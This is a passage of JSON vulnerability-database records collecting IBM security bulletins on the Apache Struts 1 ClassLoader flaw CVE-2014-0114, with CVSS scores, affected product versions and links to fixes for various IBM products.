{"lastseen": "2023-02-21T05:54:58", "description": "## Summary\n\nIBM OpenPages GRC Platform has a potential security exposure due to a vulnerability in Apache Struts version 1.\n\n## Vulnerability Details\n\nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. \n \n \n\n\nThe attack requires network access, no authentication and a low degree of specialized knowledge and techniques. An attack may compromise the confidentiality of information, the availability of the system and the integrity of data.\n\nCVE ID: [CVE-2014-0114](<https://vulners.com/cve/CVE-2014-0114>)\n\n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92889> for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n\n## Affected Products and Versions\n\nIBM OpenPages versions 6.0 through 7.0\n\n## Remediation/Fixes\n\nA fix has been created for each affected version of the named product. Download and install the fix as soon as possible. Fixes and installation instructions are provided at the URLs listed below: \n\n\n \n**Patch **| **Download URL** \n---|--- \n7.0.0.2.1| <http://www.ibm.com/support/docview.wss?uid=swg24037865> \n6.2.1.1| [](<http://www.ibm.com/support/docview.wss?uid=swg24037409>)<http://www.ibm.com/support/docview.wss?uid=swg24037409> \n6.1.0.1.4| [_http://www.ibm.com/support/docview.wss?uid=swg24037825_](<http://www.ibm.com/support/docview.wss?uid=swg24037825>) \n6.0.1.5.2| <http://www.ibm.com/support/docview.wss?uid=swg24037873> \n \n## Workarounds and Mitigations\n\nNone known, apply fixes.\n\n## ", "cvss3": {}, "published": "2018-06-15T22:31:41", "type": "ibm", "title": "Security Bulletin: IBM OpenPages GRC Platform Apache Struts V1 ClassLoader vulnerability(CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-15T22:31:41", "id": "4D4083B3DCF76307CD159ABFA977289BFD623C088D7406C26A2EE54773F4845C", "href": "https://www.ibm.com/support/pages/node/515047", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-30T21:47:19", "description": "## Abstract\n\nInformation about a security vulnerability affecting IBM WebSphere Application Server (shipped as a component of IBM PureApplication System) has been published in a security bulletin.\n\n## Content\n\nIBM WebSphere Application Server is shipped as a component of IBM PureApplication System. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n**Vulnerability Details:**\n\nPlease consult the security bulletin, [Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114](<http://www-01.ibm.com/support/docview.wss?uid=swg21672316>) for vulnerability details.\n\n**Affected Products and Versions:**\n\n** Principal Product and Version(s)**| ** Affecting Supporting Product and Version(s)** \n---|--- \nPureApplication System 1.0| WebSphere Application Server V6.1 \nPureApplication System 1.1| WebSphere Application Server V7 \n \n**Related Information** \n[IBM Secure Engineering Web Portal](<https://www-304.ibm.com/jct03001c/security/secure-engineering/>)\n\n**Change History**\n\n06 June 2014: Original Version Published\n\n[{\"Product\":{\"code\":\"SSM8NY\",\"label\":\"PureApplication System\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Component\":\"Security\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF002\",\"label\":\"AIX\"}],\"Version\":\"1.1.0.4;1.1.0.3;1.1.0.2;1.1.0.1;1.1.0.0;1.0.0.4;1.0.0.3;1.0.0.2;1.0.0.1;1.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}}]", "cvss3": {}, "published": "2018-06-15T07:00:26", "type": "ibm", "title": "Security vulnerability found in IBM WebSphere Application Server shipped with IBM PureApplication System (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-15T07:00:26", "id": "1E014E7185ECE2676B9171118053A4D1DDB9F759CD3863CCB79D1B3DBD175B95", "href": "https://www.ibm.com/support/pages/node/511819", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:41:52", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Rational ClearCase. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\n| **Subscribe to My Notifications to be notified of important product support alerts like this.**\n\n * Follow [this link](<https://www.ibm.com/systems/support/myview/subscription/css.wss/subscriptions?methodName=startSearchToSubscribe&uctug_rational_dcfsbblurb_2013-11-05_myn_adoption_promo>) for more information (requires login with your IBM ID) \n---|--- \n \nReview [Security Bulletin: Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114](<http://www.ibm.com/support/docview.wss?uid=swg21672316>) for vulnerability details.\n\n## Affected Products and Versions\n\nIBM Rational ClearCase, CM Server/CCRC WAN server component \n\n**Version**\n\n| \n\n**Status** \n \n---|--- \n8.0.1.x| Not affected \n8.0.0.x| Affected only if you are using WebSphere Application Server version 7 \n7.1.0.x, 7.1.1.x, 7.1.2.x| Affected \n7.0.x| Not affected \nThis vulnerability only applies to the WAN server component, not to other parts of IBM Rational ClearCase. \n\n## Remediation/Fixes\n\nUpdate your CM Server/CCRC WAN server system to a newer version of WebSphere Application Server. Apply the fixes listed in the [security bulletin](<http://www.ibm.com/support/docview.wss?uid=swg21672316>). \n\n**Affected Versions**\n\n| \n\n** Applying the fix** \n \n---|--- \n7.1.0.x, 7.1.1.x, and 7.1.2.x| [Document 1390803](<http://www.ibm.com/support/docview.wss?uid=swg21390803>) explains how to update WebSphere Application Server for ClearCase CM Servers at release 7.1.x. Consult those instructions when applying the fix. \n8.0.0.x, running with WebSphere Application Server 7| Apply the WebSphere Application Server fix directly to your CCRC WAN server host. No ClearCase-specific steps are necessary. \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-07-10T08:34:12", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with Rational ClearCase", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-07-10T08:34:12", "id": "08ECBCA670F0B3F435801B7A34A3A7C7EF6315794FDF864F61E57E02C2E3EFDD", "href": "https://www.ibm.com/support/pages/node/509987", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:46:43", "description": "## Summary\n\nTADDM is vulnerable to Open Source Apache Struts V1 ClassLoader manipulation that allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes.\n\n## Vulnerability Details\n\nCVE-ID: **CVE-2014-0114** \nDescription: \nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. \n \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: <https://exchange.xforce.ibmcloud.com/vulnerabilities/92889> \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n## Affected Products and Versions\n\nTADDM 7.2.2\n\n## Remediation/Fixes\n\n_EFixes prepared on top of latest FixPack for each TADDM stream:_\n\n**_Fix*_**| **_VRMF_**| **_APAR_**| **_How to acquire fix_** \n---|---|---|--- \n_efix_struts_FP120131216.zip_| _7.2.2.1_| _None_| [Download eFix](<ftp://ftp.ecurep.ibm.com/fromibm/tivoli/efix_struts_FP120131216.zip>) \nPlease get familiar with eFix readme in etc/<efix_name>_readme.txt \n\n## Workarounds and Mitigations\n\nThe only solution is to apply eFix prepared to specific TADDM version. \nIf you need eFix for other TADDM version, please contact IBM Support.\n\n## ", "cvss3": {}, "published": "2018-06-17T14:41:47", "type": "ibm", "title": "Security Bulletin: TADDM - Struts V1 ClassLoader manipulation vulnerability (CVE-2014-0114).", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-17T14:41:47", "id": "B0A86AE748A5FEB5B28098C199E3AE109F5F415CD018723CC5E174C68579E28F", "href": "https://www.ibm.com/support/pages/node/512139", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:58:35", "description": "## Summary\n\nA class loader manipulation vulnerability exists in the Apache Struts 1, which is used by IBM WebSphere Application Server and is provided with WebSphere Enterprise Service Bus Registry Edition\n\n## Vulnerability Details\n\nThis security vulnerability is fixed with available interim fixes and are targeted for specific WebSphere Application Server fix pack levels. For more information on these fixes, see [Security Bulletin: Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114](<http://www.ibm.com/support/docview.wss?uid=swg21672316>). \n\n\n## ", "cvss3": {}, "published": "2018-06-15T07:00:19", "type": "ibm", "title": "Security Bulletin: Class loader manipulation vulnerability in IBM WebSphere Application Server that shipped with WebSphere Enterprise Service Bus Registry Edition (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-15T07:00:19", "id": "03BBDC7050471C64169EF3EC23FC2B3C55CC822FFA0D98F53466C52354E175A2", "href": "https://www.ibm.com/support/pages/node/511307", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:58:33", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of products included in the IBM WebSphere Dynamic Process Edition package: IBM WebSphere Process Server, IBM WebSphere Business Monitor, IBM WebSphere Business Services Fabric. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nFor vulnerability details, see the Security Bulletin: [_Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114_](<http://www.ibm.com/support/docview.wss?uid=swg21672316>)\n\n## Affected Products and Versions\n\n**Affected product and version**\n\n| \n\n**Product and version shipped as a component** \n \n---|--- \n \nIBM WebSphere Dynamic Process Edition V7.0.x \n\n| \n\nIBM WebSphere Application Server V7.0.0.x \n \n## ", "cvss3": {}, "published": "2018-06-15T07:00:25", "type": "ibm", "title": "Security Bulletin: Security vulnerability in IBM WebSphere Application Server, which is shipped with IBM WebSphere Dynamic Process Edition (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-15T07:00:25", "id": "8C5F9E00411BC48544E09C07DE0A9332CE9F2162272F1C9EE415D926FE3F077D", "href": "https://www.ibm.com/support/pages/node/511429", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:46:45", "description": "## Summary\n\nTivoli Integrated Portal (TIP) & embedded Websphere Application Server (eWAS) is shipped as a component of Tivoli Business Service Manager. Information about a security vulnerability affecting Tivoli Integrated Portal (TIP) & embedded Websphere Application Server (eWAS) has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the security bulletin[ **Security Bulletin: ClassLoader manipulation with Apache Struts affecting Tivoli Integrated Portal (CVE-2014-0114)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21674379>) for vulnerability details.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \n**Tivoli Business Service Manager** 4.2.0; 4.2.1| **Tivoli Integrated Portal (TIP)** 1.x \n**Tivoli Business Service Manager** 6.1.0; 6.1.1| **Tivoli Integrated Portal (TIP)** 2.x \n \n## ", "cvss3": {}, "published": "2018-06-17T14:41:42", "type": "ibm", "title": "Security Bulletin:A security vulnerability has been identified in Tivoli Integrated Portal (TIP) & embedded Websphere Application Server (eWAS) shipped with Tivoli Business Service Manager (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-17T14:41:42", "id": "7D46658778E442AD0D43B74E767B5638C73A3147A2AD662C6A1BAB31343A96D2", "href": "https://www.ibm.com/support/pages/node/511903", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:58:31", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of WebSphere Remote Server. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nFor vulnerability details, see the [_Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114_](<http://www.ibm.com/support/docview.wss?uid=swg21672316>) document.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nWebsphere Remote Server version 6.1, 6.2, 6.2.1, 7.0, 7.1, 7.1.1, 7.1.2| WebSphere Application Server version 6.1, 7 \n \n## ", "cvss3": {}, "published": "2018-06-15T07:00:50", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with WebSphere Remote Server CVE-2014-0114", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-15T07:00:50", "id": "C5BECC1FF633D3A61CC27E6C697004609D2D53037AA1A203924F83717DF01AC2", "href": "https://www.ibm.com/support/pages/node/513885", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:39:34", "description": "## Summary\n\nThere is a ClassLoader manipulation vulnerability in Apache Struts that is used by the WebSphere Application Server bundled with Rational Application Developer\n\n## Vulnerability Details\n\n| **Subscribe to My Notifications to be notified of important product support alerts like this.**\n\n * Follow [this link](<https://www.ibm.com/systems/support/myview/subscription/css.wss/subscriptions?methodName=startSearchToSubscribe&uctug_rational_dcfsbblurb_2013-11-05_myn_adoption_promo>) for more information (requires login with your IBM ID) \n---|--- \n \n**CVEID:** [_CVE-2014-0114_](<https://vulners.com/cve/CVE-2014-0114>) \n\n\n \n**Description: **Apache Struts 1.X could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. There is partial impact to confidentiality, integrity, and availability. \n \n**CVSS Base Score:** 7.5 \n**CVSS Temporal Score:** See _<https://exchange.xforce.ibmcloud.com/vulnerabilities/92889>_ for the current score \n**CVSS Environmental Score*:** Undefined \n**CVSS Vector:** (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n\n## Affected Products and Versions\n\nRational Application Developer 9.1 and earlier\n\n## Remediation/Fixes\n\n**Product**\n\n| **VRMF**| **APAR**| **Remediation/First Fix** \n---|---|---|--- \nRational Application Developer| 7.0 through 7.0.0.10 Interim Fix 002.| [PI18804](<http://www.ibm.com/support/docview.wss?uid=swg1PI18804>)| \n\n * For versions 6.1.0.0 through to V6.1.0.47, apply [WebSphere Application Server 6.1 Test Environment Update 6.1.0.47u2](<http://www.ibm.com/support/docview.wss?uid=swg24037637>). \nRational Application Developer| 7.5 through 7.5.5.5 Interim Fix 001 \n \n8.0 through 8.0.4.3| [PI18804](<http://www.ibm.com/support/docview.wss?uid=swg1PI18804>)| \n\n * For versions 6.1.0.0 through to V6.1.0.47, apply [WebSphere Application Server 6.1 Test Environment Update 6.1.0.47u2](<http://www.ibm.com/support/docview.wss?uid=swg24037637>).\n * For versions 7.0.0.0 through to V7.0.0.31, apply [WebSphere Application Server 7.0 Test Environment Extension 7.0.0.31u1](<http://www.ibm.com/support/docview.wss?uid=swg24037638>). \nRational Application Developer| 8.5 through 8.5.5 \n9.0 thorugh 9.1| [PI18804](<http://www.ibm.com/support/docview.wss?uid=swg1PI18804>)| \n\n * For versions 7.0.0.0 through to V7.0.0.31, apply [WebSphere Application Server 7.0 Test Environment Extension 7.0.0.31u1](<http://www.ibm.com/support/docview.wss?uid=swg24037638>). \n \n**Note**: The [fix provided by WebSphere Application Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21672316>) can also be directly applied to the WebSphere Test Environment packaged with Rational Application Developer. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2020-02-05T00:09:48", "type": "ibm", "title": "Security Bulletin: ClassLoader manipulation with Apache Struts in WebSphere Application Server affecting Rational Application Developer (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2020-02-05T00:09:48", "id": "3CE0DEF06FC9CE41C148F15E374E35024D02AFF49A540400F0AD056CB1C2A1C4", "href": "https://www.ibm.com/support/pages/node/511427", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:45:59", "description": "## Summary\n\nThere is a ClassLoader manipulation vulnerability in Apache Struts that is used by Tivoli Integrated Portal (TIP) & embedded Websphere Application Server (eWAS)\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2014-0114_](<https://vulners.com/cve/CVE-2014-0114>) \n \n**DESCRIPTION: **Apache Struts 1.X could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. There is partial impact to confidentiality, integrity, and availability. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92889> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n\n## Affected Products and Versions\n\nTivoli Integrated Portal (TIP) version 1.x and version 2.x\n\n## Remediation/Fixes\n\nFor TIP version 1.x (1.1.x, 1.1.1.x), the Interim fix (IFIX) from Websphere Application Server (WAS) can be applied to the affected environment. Please follow the below link to download the fix: \n\n[http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Application+Server&release=All&platform=All&function=fixId&fixids=6.1.0.31-WS-WAS-IFPI17190&includeSupersedes=0](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Application+Server&release=All&platform=All&function=fixId&fixids=6.1.0.31-WS-WAS-IFPI17190&includeSupersedes=0>)\n\nFor TIP version 2.x (2.1/2.2), please click on the below IBM Fix Central link to download the INTERIM FIX from TIP to install the fix in the affected environment. Readme is available as part of the Interim Fix zip file.\n\n \n[http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ETivoli&product=ibm/Tivoli/Tivoli+Integrated+Portal&release=All&platform=All&function=aparId&apars=PI18558&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ETivoli&product=ibm/Tivoli/Tivoli+Integrated+Portal&release=All&platform=All&function=aparId&apars=PI18558&source=fc>)\n\nNote: \n\nThe fix for TIP 1.x is applicable only for TIP 1.1.1.15 FP & above (WAS 6.1.0.31 & above) \n\nThe fix for TIP 2.x is applicable to ALL fixpack levels of TIP 2.2 and some fixpack levels of TIP 2.1 (WAS 7.0.0.13 & above)\n\nPlease refer to this page for TIP-WAS version mapping:\n\n<https://www.ibm.com/developerworks/community/blogs/26d4aa47-4fd6-460d-a93b-3ee8945324d6/entry/what_was_fixpacks_are_included_in_tip_fixpacks?lang=en>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-06-17T15:15:18", "type": "ibm", "title": "Security Bulletin: ClassLoader manipulation with Apache Struts affecting Tivoli Integrated Portal (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-17T15:15:18", "id": "19663A6693672015D5E48ABEE9A76AB50A1C71EE9CF0548228C739933A353C88", "href": "https://www.ibm.com/support/pages/node/511475", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:49:32", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Rational Asset Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\n| **Subscribe to My Notifications to be notified of important product support alerts like this.**\n\n * Follow [this link](<https://www.ibm.com/systems/support/myview/subscription/css.wss/subscriptions?methodName=startSearchToSubscribe&uctug_rational_dcfsbblurb_2013-11-05_myn_adoption_promo>) for more information (requires login with your IBM ID) \n---|--- \n \nReview [Security Bulletin: Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114](<http://www.ibm.com/support/docview.wss?uid=swg21672316>) for vulnerability details. \n\n## Affected Products and Versions\n\n**Version **\n\n| **Status** \n---|--- \nIBM Rational Asset Manager \nV7.5.2, V7.5.1, V7.5, V7.2| Affected \n \n## Remediation/Fixes\n\nReview the **Remediation/Fixes** section in [Security Bulletin: Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114](<http://www.ibm.com/support/docview.wss?uid=swg21672316>) for to locate the proper fix for your version of IBM WebSphere Application Server.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-06-17T04:54:38", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Rational Asset Manager (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-17T04:54:38", "id": "E9402FC09A28106AF2485DB38FE701AD9E89189CD8A1924DECD9BC2BFC341007", "href": "https://www.ibm.com/support/pages/node/511469", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:46:58", "description": "## Summary\n\nAn Open Source Apache Struts V1 ClassLoader manipulation vulnerability affects the web application server that is used by the administration console in IBM Content Analytics with Enterprise Search (now named IBM Watson Content Analytics) and IBM OmniFind Enterprise Edition.\n\n## Vulnerability Details\n\nThis vulnerability affects only the administration console; it does not affect enterprise search applications or the content analytics miner. \n\n**CVE ID: **[**CVE-2014-0114**](<https://vulners.com/cve/CVE-2014-0114>)\n\n \n \n**DESCRIPTION: ** \nOpen Source Apache Struts V1 ClassLoader manipulation vulnerability. \n \n**CVSS:** \nBase Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92889> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n\n## Affected Products and Versions\n\nIBM Content Analytics with Enterprise Search V3.0 and V2.2 \nIBM OmniFind Enterprise Edition V9.1\n\n## Remediation/Fixes\n\nThe Apache Struts used by the web application server may be vulnerable to a class loader manipulation. IBM recommends installing recommended fixes as outlined below. If you use IBM WebSphere Application Server in your Content Analytics with Enterprise Search V3.0 system instead of the embedded web application server, also consult the security bulletin [Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114](<http://www-01.ibm.com/support/docview.wss?uid=swg21672316>) for vulnerability details. \n \n\n\n**_Product_**| **_VRMF_**| **_APAR_**| **_How to acquire the fix_** \n---|---|---|--- \nIBM Content Analytics with Enterprise Search| V3.0| None.| \n\n 1. If not already installed, install V3.0 Fix Pack 4 (see the Fix Pack [download document](<http://www.ibm.com/support/docview.wss?uid=swg24036509>)). \n 2. Download and apply [Interim Fix IF001](<http://www.ibm.com/support/fixcentral>). See the 3.0.0.4-WT-ICAwES-ReadMe-IF001 file for instructions. \nIBM Content Analytics| V2.2| None.| \n\n 1. If not already installed, install V2.2 Fix Pack 3 (see the Fix Pack [download document](<http://www.ibm.com/support/docview.wss?uid=swg24033352>)).\n 2. Download and apply [Interim Fix IF001](<http://www.ibm.com/support/fixcentral>). See the 2.2.0.3-WT-ICA-ReadMe-IF001 file for instructions. \nOmniFind Enterprise Edition| V9.1| None.| \n\n 1. If not already installed, install V9.1 Fix Pack 5 (see the Fix Pack [download document](<http://www.ibm.com/support/docview.wss?uid=swg24035824>)).\n 2. Download and apply [Interim Fix IF002](<http://www.ibm.com/support/fixcentral>). See the 9.1.0.5-WT-OEE-ReadMe-IF002 file for instructions. \n \n## ", "cvss3": {}, "published": "2018-06-17T13:02:01", "type": "ibm", "title": "Security Bulletin: Open Source Apache Struts V1 ClassLoader manipulation vulnerability (CVE-2014-0114) in IBM Content Analytics with Enterprise Search and IBM OmniFind Enterprise Edition", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 